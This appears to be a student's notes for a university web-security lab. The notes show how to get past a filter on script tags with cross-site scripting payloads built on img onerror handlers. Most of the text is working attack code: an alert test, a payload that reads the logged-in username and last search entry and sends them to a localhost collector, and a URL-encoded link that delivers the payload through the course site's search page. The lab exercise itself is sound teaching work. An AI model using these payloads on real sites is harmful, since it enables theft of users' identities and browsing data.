I know there are some pretty easy ways to get around filtered script tags.
For instance using <img> tags to run arbitrary code.

<img src="fsadf" onerror="alert('hi');"></img>


we can then just use the same js payload as before:
<img src="fsadf" onerror='setTimeout(function() {

url="http://localhost:31337/?stolen_user=" + document.getElementById("logged-in-user").innerHTML + "&last_search=" + document.getElementById("history-list").childNodes[1].innerHTML;

$.get(url).done(function(resp) {
console.log(resp);
});
}, 1000);'></img>

searchable payload:
<img src="fsadf" onerror='setTimeout(function(){url="http://localhost:31337/?stolen_user="+document.getElementById("logged-in-user").innerHTML+"&last_search="+document.getElementById("history-list").childNodes[1].innerHTML;$.get(url).done(function(resp){console.log(resp);});},1000);'></img>

linkable payload:
https://project2.ecen4133.org/search?q=%3Cimg+src%3D%22fsadf%22+onerror%3D%27setTimeout%28function%28%29%7Burl%3D%22http%3A%2F%2Flocalhost%3A31337%2F%3Fstolen_user%3D%22%2Bdocument.getElementById%28%22logged-in-user%22%29.innerHTML%2B%22%26last_search%3D%22%2Bdocument.getElementById%28%22history-list%22%29.childNodes%5B1%5D.innerHTML%3B%24.get%28url%29.done%28function%28resp%29%7Bconsole.log%28resp%29%3B%7D%29%3B%7D%2C1000%29%3B%27%3E%3C%2Fimg%3E
